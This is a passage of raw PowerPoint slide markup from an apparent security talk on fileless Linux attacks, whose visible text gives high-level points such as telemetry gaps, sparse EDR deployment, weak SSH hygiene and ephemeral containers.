            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="AutoShape 30"/>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31" name="AutoShape 31"/>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
        <p:nvSpPr>
          <p:cNvPr id="32" name="Freeform 32"/>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4423427" y="1386251"/>
            <a:ext cx="9441145" cy="4945071"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12588193" cy="6593427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect t="10716" b="10716"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="12588193" cy="6593427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783898" y="6883671"/>
            <a:ext cx="16682353" cy="884858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5728" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C51AF6"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>The Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204644" y="8095327"/>
            <a:ext cx="9840861" cy="1702325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Rise in Fileless Linux Attacks: Fileless attacks are increasingly common on Linux because attackers don’t need to write binaries to disk—everything runs in memory or via native system components.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 7"/>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04/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8"/>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10" name="Freeform 10"/>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2561915" y="1708532"/>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6712548" y="1708532"/>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3" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2569829" y="2229821"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14"/>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5" name="AutoShape 15"/>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16" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14780594" y="5143500"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="AutoShape 17"/>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8" name="AutoShape 18"/>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
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7D6126-10DC-F8F3-4B93-E14AD8C1595E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3314700"/>
            <a:ext cx="9268639" cy="830292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02230F96-A151-F48B-42CB-5B7846B67444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2229821"/>
            <a:ext cx="9530431" cy="3593509"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5649D17-0819-B675-C620-6470EA6F7A15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2745369" y="6460607"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4FC942F-3933-2958-D491-BEB356F2678E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C7310C4-12C9-89C2-CB09-5BE3B0426933}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{928A16D7-43D8-0382-65A7-934F2DE32534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2573432" y="6711691"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>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971799" y="0"/>
            <a:ext cx="16306551" cy="876692"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="21742068" cy="1168922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 3"/>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11/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 4"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 5"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="971799" y="3162300"/>
            <a:ext cx="2849261" cy="2849261"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="761109" cy="761109"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 10"/>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000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 11"/>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5432245" y="3132439"/>
            <a:ext cx="2849261" cy="2849261"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="761109" cy="761109"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>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000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 14"/>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71798" y="1822526"/>
            <a:ext cx="13381339" cy="820331"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="761109" cy="219131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="761109" cy="219131"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="761109" h="219131">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="761109" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761109" y="219131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="219131"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="761109" cy="266756"/>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9892692" y="3132439"/>
            <a:ext cx="2849261" cy="2849261"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="761109" cy="761109"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Freeform 37"/>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000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="TextBox 38"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39" name="Group 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14353138" y="3132439"/>
            <a:ext cx="2849261" cy="2849261"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="761109" cy="761109"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Freeform 40"/>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000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 41"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203682" y="2061292"/>
            <a:ext cx="12359918" cy="269689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2114"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1761" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Key Point: Attackers are adapting to Linux telemetry gaps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5561689" y="3351514"/>
            <a:ext cx="2719817" cy="1081515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2097" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>More reliance on CLI admin activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101242" y="3381375"/>
            <a:ext cx="2719817" cy="1825308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2097" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Fewer EDR deployments and Less standardized logging </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10022135" y="3351514"/>
            <a:ext cx="2719817" cy="709618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2097" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>High prevalence of weak SSH hygiene</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14487473" y="3351514"/>
            <a:ext cx="2719817" cy="1453411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2936"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2097" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Widespread containerization, ephemeral workloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2097" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="Group 54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12107455" y="607004"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="AutoShape 55"/>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56" name="AutoShape 56"/>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57" name="Group 57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4309404" y="3924300"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="AutoShape 58"/>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59" name="AutoShape 59"/>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60" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DE3C65-E55A-637B-A42B-169FA1390294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8814302" y="3924300"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{508034DF-A00F-122A-592A-FE437F4F55D2}"/>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62" name="AutoShape 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA9E3584-EFB2-1578-72B3-030C65A4C04D}"/>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63" name="Group 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4957CF67-94FB-9FA9-4791-5B44411AA004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13258800" y="4000500"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE3CB09-EE89-50E9-2621-2814E6AAA201}"/>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65" name="AutoShape 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
